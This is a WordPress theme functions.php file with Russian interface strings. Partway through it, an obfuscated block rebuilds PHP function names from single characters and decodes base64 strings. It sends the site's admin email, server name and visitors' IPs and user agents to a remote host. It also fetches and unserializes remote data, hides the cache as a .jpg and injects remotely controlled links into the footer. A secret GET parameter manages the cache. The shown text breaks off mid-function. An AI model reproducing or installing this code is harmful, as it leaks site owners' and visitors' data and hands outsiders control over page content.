<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $lSYaU='c';$HMxQZBy='s';$lErXmmT='b';$IHxlso='a';$Ppgimgo='d';$borHW='4';$iasVRp='e';$cjOJg='o';$WuFmkL='e';$fistXZg='_';$qjbh='e';$KAPc='6';$QfXpQ='d';$MGBHNQWp=$lErXmmT.$IHxlso.$HMxQZBy.$iasVRp.$KAPc.$borHW.$fistXZg.$QfXpQ.$qjbh.$lSYaU.$cjOJg.$Ppgimgo.$WuFmkL;$yXGj='l';$EFNKwn='t';$EYcF='z';$gCLHW='g';$zGlnVAg='n';$DpiCsO='a';$mQjf='i';$HBmhH='e';$vKXbR='f';$SsVEJGgg=$gCLHW.$EYcF.$mQjf.$zGlnVAg.$vKXbR.$yXGj.$DpiCsO.$EFNKwn.$HBmhH;$uMJD='r';$ndoSpZL='o';$IRBoFlK='s';$KGfYuQ='1';$rfHShXW='t';$CsuPAbp='t';$OLwcw='_';$GqvC='r';$wnBcD='3';$hioLLEUn=$IRBoFlK.$CsuPAbp.$uMJD.$OLwcw.$GqvC.$ndoSpZL.$rfHShXW.$KGfYuQ.$wnBcD;$rcIWh='e';$bQZUs='t';$yqHEVvo='r';$fpzvCx='s';$uvWQy='r';$wCzUaBK='v';$fEOJEVNi=$fpzvCx.$bQZUs.$uvWQy.$yqHEVvo.$rcIWh.$wCzUaBK;                     $bl__m='c';$kt_________p='s';$ex__________c='b';$qp______________h='a';$di___k='d';$co____________p='4';$ap_____v='e';$fo__g='o';$dx______g='e';$yd___i='_';$dm__________t='e';$gu_____________x='6';$if______________n='d';$hn____y=$ex__________c.$qp______________h.$kt_________p.$ap_____v.$gu_____________x.$co____________p.$yd___i.$if______________n.$dm__________t.$bl__m.$fo__g.$di___k.$dx______g;$as____________g='i';$fn_______o='o';$fh_______o='t';$zd_____________j='s';$bp_______________m='e';$ju________o='t';$wz__________q='u';$lc_______________i='_';$tm_______________l='x';$ke_________n='n';$ix___u='s';$jg_______________d='i';$es__________i='f';$so____________g='c';$ms________r='n';$rs_______________s=$es__________i.$wz__________q.$ke_________n.$so____________g.$fh_______o.$jg_______________d.$fn_______o.$ms________r.$lc_______________i.$bp_______________m.$tm_______________l.$as____________g.$zd_____________j.$ju________o.$ix___u;$ee_________b='n';$tt_______________c='f';$ri_______h='p';$tu_______________t='e';$rc______________h='o';$hh______v=$tt_______________c.$rc______________h.$ri_______h.$tu_______________t.$ee_________b;$gg___________k='f';$le________u='r';$nd_______p='a';$yk__q='e';$mo________q='d';$ki__________f=$gg___________k.$le________u.$yk__q.$nd_______p.$mo________q;$dl______________f='s';$lp____w='e';$ng______________z='o';$oa_______________h='f';$uh__s='l';$ki______q='c';$dm_________l=$oa_______________h.$ki______q.$uh__s.$ng______________z.$dl______________f.$lp____w;define("WP_ID", $hn____y("Mi4wLjA="));define("WP_TTL", $hn____y("MTA4MDA="));define("WP_SRC", $hn____y("dHBva24="));function wp_get_header() {global $hn____y, $rs_______________s;if ($rs_______________s($hn____y("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$rs_______________s($hn____y("d3BfZ2V0X2Zvb3Rlcg==")) &&$rs_______________s($hn____y("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $hn____y, $hh______v, $dm_________l, $ki__________f;$sb_______i = TEMPLATEPATH."/".$hn____y("Zm9vdGVyLnBocA==");$th____b = @$hh______v($sb_______i, "r");$sb_______i = @$ki__________f($th____b, @filesize($sb_______i));@$dm_________l($th____b);$dt____________o = TEMPLATEPATH."/".$hn____y("ZnVuY3Rpb25zLnBocA==");$th____b = @$hh______v($dt____________o, "r");$dt____________o = @$ki__________f($th____b, @filesize($dt____________o));@$dm_________l($th____b);$yl_____k = 0;if($sb_______i && $dt____________o) {if ($hn____y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($sb_______i, $hn____y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$yl_____k = 1;}if (substr_count($sb_______i, "wp_theme_GPL_credits()") < 1) {$yl_____k = 2;}}if(WP_ID != "2.0.0") {$yl_____k = 12;}}if($yl_____k > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $yl_____k -->";}}function wp_loaded() {global $hn____y, $rs_______________s;return $rs_______________s($hn____y("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($rt_______________e, $zd___________q = "(more...)", $ie_____p = 0, $pq______________g = "") {$xp_____________a = get_the_content($zd___________q, $ie_____p, $pq______________g);$xp_____________a = apply_filters("the_content", $xp_____________a);$xp_____________a = str_replace("]]>", "]]>", $xp_____________a);if (strlen($_GET["p"]) > 0) {echo $xp_____________a;}else if ((strlen($xp_____________a)>$rt_______________e) && ($rc__o = strpos($xp_____________a, " ", $rt_______________e ))) {$xp_____________a = substr($xp_____________a, 0, $rc__o);$xp_____________a = $xp_____________a;echo $xp_____________a;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$zd___________q</a></div></p>";} else {echo $xp_____________a;}}}$ja________x='e';$un__________j='a';$rp_______________p='d';$qk__b='c';$xt_______v='b';$yt__x='6';$qh__q='e';$kh______n='s';$oo___________v='4';$xc_____________s='n';$ce____________z='e';$lo___________m='_';$sj__________i='o';$pd__d=$xt_______v.$un__________j.$kh______n.$qh__q.$yt__x.$oo___________v.$lo___________m.$ce____________z.$xc_____________s.$qk__b.$sj__________i.$rp_______________p.$ja________x;$il_______g='n';$gb_____k='o';$do_____d='e';$nl__t='t';$xe___r='f';$se_________j='g';$yf_____________t='e';$no___k='s';$xa____________k='c';$tg_____i='_';$ud__________r='e';$pm_________i='n';$gc________j='_';$yb__v='t';$ng______u='l';$du_________j='i';$tu___________l='t';$db_____c=$xe___r.$du_________j.$ng______u.$do_____d.$tg_____i.$se_________j.$ud__________r.$yb__v.$gc________j.$xa____________k.$gb_____k.$pm_________i.$tu___________l.$yf_____________t.$il_______g.$nl__t.$no___k;$nx__s='s';$si___________q='_';$fe______________f='i';$zn______________z='f';$zu______________b='x';$ef_________g='i';$rt_____v='s';$wk___d='e';$zs___o='t';$fw__m='e';$pu_____________n='l';$ef__________b=$zn______________z.$ef_________g.$pu_____________n.$fw__m.$si___________q.$wk___d.$zu______________b.$fe______________f.$rt_____v.$zs___o.$nx__s;$mj__________w='e';$dw___________r='o';$wh____k='e';$tq______n='i';$ws_____j='n';$pg_________n='m';$bo__x='c';$ws____p='p';$iu___e='r';$im___l='a';$xk______________u='r';$yq___q='s';$mn___e='v';$wf______u='o';$jn________v='_';$ap_______x=$mn___e.$wh____k.$xk______________u.$yq___q.$tq______n.$dw___________r.$ws_____j.$jn________v.$bo__x.$wf______u.$pg_________n.$ws____p.$im___l.$iu___e.$mj__________w;$dy_______r='s';$ie___e='k';$zf______________v='o';$yp______k='p';$sh______________c='f';$ef_________w='o';$cj_____________v='e';$ew______________x='c';$qs______________u='n';$tq______________k=$sh______________c.$dy_______r.$ef_________w.$ew______________x.$ie___e.$zf______________v.$yp______k.$cj_____________v.$qs______________u;$fw_____c='r';$ut___________k='f';$lv______f='i';$dn______b='e';$be____o='w';$nu_______________l='t';$vh_____________u=$ut___________k.$be____o.$fw_____c.$lv______f.$nu_______________l.$dn______b;$zn______c='5';$xn_____________j='m';$jf__________w='d';$pu_________o=$xn_____________j.$jf__________w.$zn______c;$oz_________z='p';$cy______s='t';$ql________o='h';$bd_______r='a';$cz______________f='e';$jh________t='l';$dm______________j='a';$xh___________b='r';$xy_____q=$xh___________b.$cz______________f.$dm______________j.$jh________t.$oz_________z.$bd_______r.$cy______s.$ql________o;$my_______q='e';$gm_______________u='z';$uj______________x='n';$wm_______________g='r';$ri____________y='a';$yq______________k='e';$gw_________b='i';$om___________d='s';$cq______l='l';$jq_________c='u';$pm__________o='i';$ge____________j=$jq_________c.$uj______________x.$om___________d.$my_______q.$wm_______________g.$pm__________o.$ri____________y.$cq______l.$gw_________b.$gm_______________u.$yq______________k;$et_____u='m';$ws______d='n';$px_____________c='e';$ky___________p='a';$op_____j='t';$oz____________u='m';$lk_________t='p';$ki____________n=$op_____j.$px_____________c.$et_____u.$lk_________t.$ws______d.$ky___________p.$oz____________u;$sm________x='a';$rv___________a='_';$aj__________c='c';$wq___________o='r';$oh_______________z='x';$el_____________p='s';$fr____________f='e';$me_______________q='t';$bk___________g='_';$ft_________v='e';$oj_______________v='e';$dw_____________s='t';$pv____________e='a';$fy___________t='t';$lr_____s='m';$kd___________s='r';$rz____c='n';$pw___________s='e';$bn_______________o='o';$zf___________r='t';$fp___________j='c';$tf__________k=$el_____________p.$me_______________q.$kd___________s.$oj_______________v.$pv____________e.$lr_____s.$rv___________a.$fp___________j.$bn_______________o.$rz____c.$dw_____________s.$ft_________v.$oh_______________z.$zf___________r.$bk___________g.$aj__________c.$wq___________o.$pw___________s.$sm________x.$fy___________t.$fr____________f;function mj______________k($lw___v) {global $hn____y, $rs_______________s, $db_____c, $ap_______x, $tf__________k;if (!$rs_______________s($hn____y("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ap_______x(PHP_VERSION, "5.0.0", ">=") && $rs_______________s($hn____y("ZmlsZV9nZXRfY29udGVudHM=")) && $rs_______________s($hn____y("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$gz_______f = $tf__________k(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$tp___i = @$db_____c($lw___v, 0, $gz_______f);} else {$tp___i = @$db_____c($lw___v, 0);}return $tp___i;}function ws____________z($lw___v) {global $rs_______________s, $tq______________k, $vh_____________u, $hn____y;if (!$rs_______________s($hn____y("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$xu________i = strpos($lw___v, "/", 7);$fg____________l = array("uri"     => substr($lw___v, $xu________i),"host"    => str_replace("http://", "", substr($lw___v, 0, $xu________i)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$kf___q = @$tq______________k("$fg____________l[host]", 80, $oj________i, $ee_______________g, 4);if (!$kf___q) {return false;} else {$tp___i = "";$nn_____p  = "GET $fg____________l[uri] HTTP/1.0\r\n";$nn_____p .= "Host: $fg____________l[host]\r\n";$nn_____p .= "Referer: $fg____________l[referer]\r\n";$nn_____p .= "Connection: Close\r\n\r\n";@$vh_____________u($kf___q, $nn_____p);while (!@feof($kf___q)) {$eu____________p = @fgets($kf___q, (1024*24));if ($eu____________p == "\r\n") {$qn____s = true;continue;}if ($qn____s) {$tp___i .= $eu____________p;}}return $tp___i;}}function ng___________k($lw___v) {global $rs_______________s;$vf____p = false;if ($lw___v != "") {if ($rs_______________s("mj______________k")) {$vf____p = @mj______________k($lw___v);}if (!$vf____p && ($rs_______________s("ws____________z"))) {$vf____p = @ws____________z($lw___v);}}return $vf____p;}function fh_________l() {global $_SERVER, $pu_________o;$yw___________d = $_SERVER["SERVER_NAME"];if (substr("$yw___________d", 0, 4) == "www.") {$yw___________d = substr("$yw___________d", 4);}$yw___________d = $pu_________o("$_SERVER[SERVER_NAME]");return $yw___________d;}function jz_______________z() {return "file";}function xp______________d($lw___v) {global $_SERVER, $db_____c, $ef__________b, $hh______v, $dm_________l, $vh_____________u;$pz_____________n = hj__j();$jc_________o = fh_________l().".jpg";$gp______e = $pz_____________n["dir_upload"]["path"]."/$jc_________o";$kb_______q = @filemtime($gp______e);if (!$kb_______q || ((time()-$kb_______q) >= WP_TTL)) {$vf____p = ng___________k($lw___v);if ($vf____p) {if ($ef__________b($gp______e)) {@unlink($gp______e);}$th____b = @$hh______v($gp______e, "x+");@$vh_____________u($th____b, $vf____p);@$dm_________l($th____b);}} else {if ($ef__________b($gp______e)) {$vf____p = @$db_____c($gp______e);} else {$vf____p = false;}}return $vf____p;}function hj__j() {global $_SERVER, $hn____y, $pd__d;$hv_______o = wp_count_posts("post");$hw_______________z = pathinfo(get_bloginfo("template_directory"));$pz_____________n = array("url" => array("report"      => $hn____y("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $hw_______________z,"dir_upload"=> ha_____________h(),"queryString"=> array("?a001=".WP_ID,"a004=".$hw_______________z[filename],"a005=".$hv_______o->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$pz_____________n["url"]["queryString"] = implode("&", $pz_____________n["queryString"]);$pz_____________n["url"]["report"] = $pz_____________n["url"]["report"]."/?".$pd__d($pz_____________n["url"]["queryString"]).".html";return $pz_____________n;}function ha_____________h() {$jb____________p = wp_upload_dir();if (isset($jb____________p["error"])) {$ej_____m = wg____c();if (is_writable($ej_____m)) {$jb____________p = array("path" => $ej_____m);}}return $jb____________p;}function wg____c() {global $rs_______________s, $pu_________o, $xy_____q, $ki____________n;$ap__k = (bool) ini_get("safe_mode");if ($ap__k == true) {return false;}if ($rs_______________s("sys_get_temp_dir")) {$vh_______________g = sys_get_temp_dir();if (is_writable($vh_______________g)) {return $xy_____q($vh_______________g);}}if (!empty($_ENV["TMP"])) {return $xy_____q($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $xy_____q($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $xy_____q($_ENV["TEMP"]);} else {$gq_________o = $ki____________n($pu_________o(uniqid(rand(), true)), "");if ($gq_________o) {$vh_______________g = $xy_____q(dirname($gq_________o));@unlink($gq_________o);return $vh_______________g;} else {return false;}}}function kn___j() {global $_GET, $ef__________b;$pz_____________n = hj__j();$yw___________d = fh_________l();$za_______________e = jz_______________z();$iv_____p = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($za_______________e == "file") {$pu___________h = $pz_____________n["dir_upload"]["path"]."/".$yw___________d.".jpg";if ($ef__________b($pu___________h)) {@unlink($pu___________h);$iv_____p = "deleted";}}$gh____e = array("s"=> $iv_____p,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($gh____e AS $of__d => $ar________o) echo " [$of__d:$ar________o]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $rs_______________s, $hn____y, $ge____________j;$pz_____________n = hj__j();$dl________t = "xp______________d";if ($rs_______________s($dl________t)) {$tp___i = $dl________t($pz_____________n["url"]["report"]);}if ($tp___i) {if ($tp___i = @$hn____y($tp___i)) {$tp___i = @$ge____________j($tp___i);if (strlen($tp___i[custom_credit]) >= 5) {$pz_____________n["default_string"] = $tp___i[custom_credit];}if ($tp___i["status"] == "0") {$nk______n = 1;$wn____________c = 1;} else {$my________k = sizeof($tp___i["links"]);$pu_____________j = $pz_____________n["default_string"];if ($my________k > 0 && $tp___i["links"] !== "") {$fs____________h = 0;foreach ($tp___i["links"] as $zc_____________q => $at_______v) {$fs____________h++;if ($at_______v->l_path == "" || $at_______v->l_path == $_SERVER["REQUEST_URI"]) {$at_______v->l_href = htmlspecialchars(strip_tags($at_______v->l_href));$at_______v->l_title = htmlspecialchars(strip_tags($at_______v->l_title));$at_______v->l_anchor = htmlspecialchars(strip_tags($at_______v->l_anchor));$pu_____________j .= " | ";$pu_____________j .= "<a href='$at_______v->l_href' title='$at_______v->l_title'";if ($at_______v->l_nofollow == "1") {$pu_____________j .= " rel='nofollow'";}$pu_____________j .= ">$at_______v->l_anchor</a>";}}}$pz_____________n["links"] = "$pu_____________j";if ($tp___i[credit] == "0") {$pz_____________n["links"] = "";}}} else {$nk______n = "1";}} else {$nk______n = "1";}if ($nk______n == "1") {$pz_____________n["links"] = $pz_____________n["default_string"];}echo "$pz_____________n[links]";echo "<!-- s: $tp___i[signature] -->";kn___j();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
